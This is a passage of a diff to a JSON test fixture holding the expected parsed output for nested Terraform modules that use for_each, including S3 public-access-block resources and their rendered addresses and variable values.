-          "__address__": "module.s3_module[\"a\"].module.inner_s3_module[\"c\"].bucket2"
+          ]
         }
       }
     ]
   },
-  "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"c\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}": {
+  "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"c\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"b\", \"nested_tf_module\": null}}}": {
     "locals": [
       {
+        "__address__": "module.s3_module[\"b\"].module.inner_s3_module[\"c\"].bucket2",
         "bucket2": [
-          "var.bucket2"
-        ],
-        "__address__": "module.s3_module2[0].module.inner_s3_module[\"c\"].bucket2"
+          false
+        ]
       }
     ],
     "resource": [
       {
         "aws_s3_bucket_public_access_block": {
           "var_bucket": {
+            "__address__": "module.s3_module[\"b\"].module.inner_s3_module[\"c\"].aws_s3_bucket_public_access_block.var_bucket",
             "__end_line__": 11,
+            "__provider_address__": "",
             "__start_line__": 5,
             "block_public_acls": [
               true
@@ -347,15 +530,14 @@
               true
             ],
             "bucket": [
-              "var.bucket2"
+              false
             ],
             "ignore_public_acls": [
               true
             ],
             "restrict_public_buckets": [
               true
-            ],
-            "__address__": "module.s3_module2[0].module.inner_s3_module[\"c\"].aws_s3_bucket_public_access_block.var_bucket"
+            ]
           }
         }
       }
@@ -363,30 +545,32 @@
     "variable": [
       {
         "bucket2": {
+          "__address__": "module.s3_module[\"b\"].module.inner_s3_module[\"c\"].bucket2",
           "__end_line__": 16,
           "__start_line__": 14,
           "type": [
             "string"
-          ],
-          "__address__": "module.s3_module2[0].module.inner_s3_module[\"c\"].bucket2"
+          ]
         }
       }
     ]
   },
-  "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"e\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}": {
+  "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"c\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}": {
     "locals": [
       {
+        "__address__": "module.s3_module2[0].module.inner_s3_module[\"c\"].bucket2",
         "bucket2": [
-          "var.bucket2"
-        ],
-        "__address__": "module.s3_module[\"a\"].module.inner_s3_module2[\"e\"].bucket2"
+          ""
+        ]
       }
     ],
     "resource": [
       {
         "aws_s3_bucket_public_access_block": {
           "var_bucket": {
+            "__address__": "module.s3_module2[0].module.inner_s3_module[\"c\"].aws_s3_bucket_public_access_block.var_bucket",
             "__end_line__": 11,
+            "__provider_address__": "",
             "__start_line__": 5,
             "block_public_acls": [
               true
@@ -395,15 +579,14 @@
               true
             ],
             "bucket": [
-              "var.bucket2"
+              ""
             ],
             "ignore_public_acls": [
               true
             ],
             "restrict_public_buckets": [
               true
-            ],
-            "__address__": "module.s3_module[\"a\"].module.inner_s3_module2[\"e\"].aws_s3_bucket_public_access_block.var_bucket"
+            ]
           }
         }
       }
@@ -411,30 +594,32 @@
     "variable": [
       {
         "bucket2": {
+          "__address__": "module.s3_module2[0].module.inner_s3_module[\"c\"].bucket2",
           "__end_line__": 16,
           "__start_line__": 14,
           "type": [
             "string"
-          ],
-          "__address__": "module.s3_module[\"a\"].module.inner_s3_module2[\"e\"].bucket2"
+          ]
         }
       }
     ]
   },
-  "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"e\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}": {
+  "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"c\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 1, \"nested_tf_module\": null}}}": {
     "locals": [
       {
+        "__address__": "module.s3_module2[1].module.inner_s3_module[\"c\"].bucket2",
         "bucket2": [
-          "var.bucket2"
-        ],
-        "__address__": "module.s3_module2[0].module.inner_s3_module2[\"e\"].bucket2"
+          ""
+        ]
       }
     ],
     "resource": [
       {
         "aws_s3_bucket_public_access_block": {
           "var_bucket": {
+            "__address__": "module.s3_module2[1].module.inner_s3_module[\"c\"].aws_s3_bucket_public_access_block.var_bucket",
             "__end_line__": 11,
+            "__provider_address__": "",
             "__start_line__": 5,
             "block_public_acls": [
               true
@@ -443,15 +628,14 @@
               true
             ],
             "bucket": [
-              "var.bucket2"
+              ""
             ],
             "ignore_public_acls": [
               true
             ],
             "restrict_public_buckets": [
               true
-            ],
-            "__address__": "module.s3_module2[0].module.inner_s3_module2[\"e\"].aws_s3_bucket_public_access_block.var_bucket"
+            ]
           }
         }
       }
@@ -459,147 +643,32 @@
     "variable": [
       {
         "bucket2": {
+          "__address__": "module.s3_module2[1].module.inner_s3_module[\"c\"].bucket2",
           "__end_line__": 16,
           "__start_line__": 14,
           "type": [
             "string"
-          ],
-          "__address__": "module.s3_module2[0].module.inner_s3_module2[\"e\"].bucket2"
+          ]
         }
       }
     ]
   },
-  "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/variable.tf\", \"tf_source_modules\": null}": {
-    "variable": [
-      {
-        "count_var": {
-          "__end_line__": 4,
-          "__start_line__": 2,
-          "default": [
-            2
-          ],
-          "__address__": "count_var"
-        }
-      },
-      {
-        "foreach_var": {
-          "__end_line__": 8,
-          "__start_line__": 6,
-          "default": [
-            [
-              "a",
-              "b"
-            ]
-          ],
-          "__address__": "foreach_var"
-        }
-      }
-    ]
-  },
-  "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"b\", \"nested_tf_module\": null}}": {
-    "module": [
-      {
-        "inner_s3_module[\"c\"]": {
-          "__end_line__": 5,
-          "__resolved__": [
-            "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}"
-          ],
-          "__start_line__": 1,
-          "bucket2": [
-            "var.bucket"
-          ],
-          "source": [
-            "./module2"
-          ],
-          "__address__": "module.s3_module[\"b\"].inner_s3_module[\"c\"]"
-        }
-      },
-      {
-        "inner_s3_module2[\"e\"]": {
-          "__end_line__": 11,
-          "__resolved__": [
-            "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}"
-          ],
-          "__start_line__": 7,
-          "bucket2": [
-            "var.bucket2"
-          ],
-          "source": [
-            "./module2"
-          ],
-          "__address__": "module.s3_module[\"b\"].inner_s3_module2[\"e\"]"
-        }
-      },
-      {
-        "inner_s3_module[\"d\"]": {
-          "__end_line__": 5,
-          "__resolved__": [
-            "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}"
-          ],
-          "__start_line__": 1,
-          "bucket2": [
-            "var.bucket"
-          ],
-          "source": [
-            "./module2"
-          ],
-          "__address__": "module.s3_module[\"b\"].inner_s3_module[\"d\"]"
-        }
-      },
-      {
-        "inner_s3_module2[\"f\"]": {
-          "__end_line__": 11,
-          "__resolved__": [
-            "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}"
-          ],
-          "__start_line__": 7,
-          "bucket2": [
-            "var.bucket2"
-          ],
-          "source": [
-            "./module2"
-          ],
-          "__address__": "module.s3_module[\"b\"].inner_s3_module2[\"f\"]"
-        }
-      }
-    ],
-    "variable": [
-      {
-        "bucket": {
-          "__end_line__": 16,
-          "__start_line__": 14,
-          "type": [
-            "string"
-          ],
-          "__address__": "module.s3_module[\"b\"].bucket"
-        }
-      },
-      {
-        "bucket2": {
-          "__end_line__": 20,
-          "__start_line__": 18,
-          "type": [
-            "string"
-          ],
-          "__address__": "module.s3_module[\"b\"].bucket2"
-        }
-      }
-    ]
-  },
-  "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"c\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"b\", \"nested_tf_module\": null}}}": {
+  "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"d\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}": {
     "locals": [
       {
+        "__address__": "module.s3_module[\"a\"].module.inner_s3_module[\"d\"].bucket2",
         "bucket2": [
-          "var.bucket2"
-        ],
-        "__address__": "module.s3_module[\"b\"].module.inner_s3_module[\"c\"].bucket2"
+          false
+        ]
       }
     ],
     "resource": [
       {
         "aws_s3_bucket_public_access_block": {
           "var_bucket": {
+            "__address__": "module.s3_module[\"a\"].module.inner_s3_module[\"d\"].aws_s3_bucket_public_access_block.var_bucket",
             "__end_line__": 11,
+            "__provider_address__": "",
             "__start_line__": 5,
             "block_public_acls": [
               true
@@ -608,15 +677,14 @@
               true
             ],
             "bucket": [
-              "var.bucket2"
+              false
             ],
             "ignore_public_acls": [
               true
             ],
             "restrict_public_buckets": [
               true
-            ],
-            "__address__": "module.s3_module[\"b\"].module.inner_s3_module[\"c\"].aws_s3_bucket_public_access_block.var_bucket"
+            ]
           }
         }
       }
@@ -624,30 +692,32 @@
     "variable": [
       {
         "bucket2": {
+          "__address__": "module.s3_module[\"a\"].module.inner_s3_module[\"d\"].bucket2",
           "__end_line__": 16,
           "__start_line__": 14,
           "type": [
             "string"
-          ],
-          "__address__": "module.s3_module[\"b\"].module.inner_s3_module[\"c\"].bucket2"
+          ]
         }
       }
     ]
   },
-  "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"e\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"b\", \"nested_tf_module\": null}}}": {
+  "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"d\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"b\", \"nested_tf_module\": null}}}": {
     "locals": [
       {
+        "__address__": "module.s3_module[\"b\"].module.inner_s3_module[\"d\"].bucket2",
         "bucket2": [
-          "var.bucket2"
-        ],
-        "__address__": "module.s3_module[\"b\"].module.inner_s3_module2[\"e\"].bucket2"
+          false
+        ]
       }
     ],
     "resource": [
       {
         "aws_s3_bucket_public_access_block": {
           "var_bucket": {
+            "__address__": "module.s3_module[\"b\"].module.inner_s3_module[\"d\"].aws_s3_bucket_public_access_block.var_bucket",
             "__end_line__": 11,
+            "__provider_address__": "",
             "__start_line__": 5,
             "block_public_acls": [
               true
@@ -656,15 +726,14 @@
               true
             ],
             "bucket": [
-              "var.bucket2"
+              false
             ],
             "ignore_public_acls": [
               true
             ],
             "restrict_public_buckets": [
               true
-            ],
-            "__address__": "module.s3_module[\"b\"].module.inner_s3_module2[\"e\"].aws_s3_bucket_public_access_block.var_bucket"
+            ]
           }
         }
       }
@@ -672,120 +741,32 @@
     "variable": [
       {
         "bucket2": {
+          "__address__": "module.s3_module[\"b\"].module.inner_s3_module[\"d\"].bucket2",
           "__end_line__": 16,
           "__start_line__": 14,
           "type": [
             "string"
-          ],
-          "__address__": "module.s3_module[\"b\"].module.inner_s3_module2[\"e\"].bucket2"
+          ]
         }
       }
     ]
   },
-  "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 1, \"nested_tf_module\": null}}": {
-    "module": [
-      {
-        "inner_s3_module[\"c\"]": {
-          "__end_line__": 5,
-          "__resolved__": [
-            "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}"
-          ],
-          "__start_line__": 1,
-          "bucket2": [
-            "var.bucket"
-          ],
-          "source": [
-            "./module2"
-          ],
-          "__address__": "module.s3_module2[1].inner_s3_module[\"c\"]"
-        }
-      },
-      {
-        "inner_s3_module2[\"e\"]": {
-          "__end_line__": 11,
-          "__resolved__": [
-            "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}"
-          ],
-          "__start_line__": 7,
-          "bucket2": [
-            "var.bucket2"
-          ],
-          "source": [
-            "./module2"
-          ],
-          "__address__": "module.s3_module2[1].inner_s3_module2[\"e\"]"
-        }
-      },
-      {
-        "inner_s3_module[\"d\"]": {
-          "__end_line__": 5,
-          "__resolved__": [
-            "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}"
-          ],
-          "__start_line__": 1,
-          "bucket2": [
-            "var.bucket"
-          ],
-          "source": [
-            "./module2"
-          ],
-          "__address__": "module.s3_module2[1].inner_s3_module[\"d\"]"
-        }
-      },
-      {
-        "inner_s3_module2[\"f\"]": {
-          "__end_line__": 11,
-          "__resolved__": [
-            "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}"
-          ],
-          "__start_line__": 7,
-          "bucket2": [
-            "var.bucket2"
-          ],
-          "source": [
-            "./module2"
-          ],
-          "__address__": "module.s3_module2[1].inner_s3_module2[\"f\"]"
-        }
-      }
-    ],
-    "variable": [
-      {
-        "bucket": {
-          "__end_line__": 16,
-          "__start_line__": 14,
-          "type": [
-            "string"
-          ],
-          "__address__": "module.s3_module2[1].bucket"
-        }
-      },
-      {
-        "bucket2": {
-          "__end_line__": 20,
-          "__start_line__": 18,
-          "type": [
-            "string"
-          ],
-          "__address__": "module.s3_module2[1].bucket2"
-        }
-      }
-    ]
-  },
-  "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"c\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 1, \"nested_tf_module\": null}}}": {
+  "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"d\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}": {
     "locals": [
       {
+        "__address__": "module.s3_module2[0].module.inner_s3_module[\"d\"].bucket2",
         "bucket2": [
-          "var.bucket2"
-        ],
-        "__address__": "module.s3_module2[1].module.inner_s3_module[\"c\"].bucket2"
+          ""
+        ]
       }
     ],
     "resource": [
       {
         "aws_s3_bucket_public_access_block": {
           "var_bucket": {
+            "__address__": "module.s3_module2[0].module.inner_s3_module[\"d\"].aws_s3_bucket_public_access_block.var_bucket",
             "__end_line__": 11,
+            "__provider_address__": "",
             "__start_line__": 5,
             "block_public_acls": [
               true
@@ -794,15 +775,14 @@
               true
             ],
             "bucket": [
-              "var.bucket2"
+              ""
             ],
             "ignore_public_acls": [
               true
             ],
             "restrict_public_buckets": [
               true
-            ],
-            "__address__": "module.s3_module2[1].module.inner_s3_module[\"c\"].aws_s3_bucket_public_access_block.var_bucket"
+            ]
           }
         }
       }
@@ -810,30 +790,32 @@
     "variable": [
       {
         "bucket2": {
+          "__address__": "module.s3_module2[0].module.inner_s3_module[\"d\"].bucket2",
           "__end_line__": 16,
           "__start_line__": 14,
           "type": [
             "string"
-          ],
-          "__address__": "module.s3_module2[1].module.inner_s3_module[\"c\"].bucket2"
+          ]
         }
       }
     ]
   },
-  "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"e\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 1, \"nested_tf_module\": null}}}": {
+  "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"d\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 1, \"nested_tf_module\": null}}}": {
     "locals": [
       {
+        "__address__": "module.s3_module2[1].module.inner_s3_module[\"d\"].bucket2",
         "bucket2": [
-          "var.bucket2"
-        ],
-        "__address__": "module.s3_module2[1].module.inner_s3_module2[\"e\"].bucket2"
+          ""
+        ]
       }
     ],
     "resource": [
       {
         "aws_s3_bucket_public_access_block": {
           "var_bucket": {
+            "__address__": "module.s3_module2[1].module.inner_s3_module[\"d\"].aws_s3_bucket_public_access_block.var_bucket",
             "__end_line__": 11,
+            "__provider_address__": "",
             "__start_line__": 5,
             "block_public_acls": [
               true
@@ -842,15 +824,14 @@
               true
             ],
             "bucket": [
-              "var.bucket2"
+              ""
             ],
             "ignore_public_acls": [
               true
             ],
             "restrict_public_buckets": [
               true
-            ],
-            "__address__": "module.s3_module2[1].module.inner_s3_module2[\"e\"].aws_s3_bucket_public_access_block.var_bucket"
+            ]
           }
         }
       }
@@ -858,30 +839,32 @@
     "variable": [
       {
         "bucket2": {
+          "__address__": "module.s3_module2[1].module.inner_s3_module[\"d\"].bucket2",
           "__end_line__": 16,
           "__start_line__": 14,
           "type": [
             "string"
-          ],
-          "__address__": "module.s3_module2[1].module.inner_s3_module2[\"e\"].bucket2"
+          ]
         }
       }
     ]
   },
-  "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"d\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}": {
+  "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"e\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}": {
     "locals": [
       {
+        "__address__": "module.s3_module[\"a\"].module.inner_s3_module2[\"e\"].bucket2",
         "bucket2": [
-          "var.bucket2"
-        ],
-        "__address__": "module.s3_module[\"a\"].module.inner_s3_module[\"d\"].bucket2"
+          ""
+        ]
       }
     ],
     "resource": [
       {
         "aws_s3_bucket_public_access_block": {
           "var_bucket": {
+            "__address__": "module.s3_module[\"a\"].module.inner_s3_module2[\"e\"].aws_s3_bucket_public_access_block.var_bucket",
             "__end_line__": 11,
+            "__provider_address__": "",
             "__start_line__": 5,
             "block_public_acls": [
               true
@@ -890,15 +873,14 @@
               true
             ],
             "bucket": [
-              "var.bucket2"
+              ""
             ],
             "ignore_public_acls": [
               true
             ],
             "restrict_public_buckets": [
               true
-            ],
-            "__address__": "module.s3_module[\"a\"].module.inner_s3_module[\"d\"].aws_s3_bucket_public_access_block.var_bucket"
+            ]
           }
         }
       }
@@ -906,30 +888,32 @@
     "variable": [
       {
         "bucket2": {
+          "__address__": "module.s3_module[\"a\"].module.inner_s3_module2[\"e\"].bucket2",
           "__end_line__": 16,
           "__start_line__": 14,
           "type": [
             "string"
-          ],
-          "__address__": "module.s3_module[\"a\"].module.inner_s3_module[\"d\"].bucket2"
+          ]
         }
       }
     ]
   },
-  "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"f\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}": {
+  "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"e\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"b\", \"nested_tf_module\": null}}}": {
     "locals": [
       {
+        "__address__": "module.s3_module[\"b\"].module.inner_s3_module2[\"e\"].bucket2",
         "bucket2": [
-          "var.bucket2"
-        ],
-        "__address__": "module.s3_module[\"a\"].module.inner_s3_module2[\"f\"].bucket2"
+          ""
+        ]
       }
     ],
     "resource": [
       {
         "aws_s3_bucket_public_access_block": {
           "var_bucket": {
+            "__address__": "module.s3_module[\"b\"].module.inner_s3_module2[\"e\"].aws_s3_bucket_public_access_block.var_bucket",
             "__end_line__": 11,
+            "__provider_address__": "",
             "__start_line__": 5,
             "block_public_acls": [
               true
@@ -938,15 +922,14 @@
               true
             ],
             "bucket": [
-              "var.bucket2"
+              ""
             ],
             "ignore_public_acls": [
               true
             ],
             "restrict_public_buckets": [
               true
-            ],
-            "__address__": "module.s3_module[\"a\"].module.inner_s3_module2[\"f\"].aws_s3_bucket_public_access_block.var_bucket"
+            ]
           }
         }
       }
@@ -954,30 +937,32 @@
     "variable": [
       {
         "bucket2": {
+          "__address__": "module.s3_module[\"b\"].module.inner_s3_module2[\"e\"].bucket2",
           "__end_line__": 16,
           "__start_line__": 14,
           "type": [
             "string"
-          ],
-          "__address__": "module.s3_module[\"a\"].module.inner_s3_module2[\"f\"].bucket2"
+          ]
         }
       }
     ]
   },
-  "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"d\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}": {
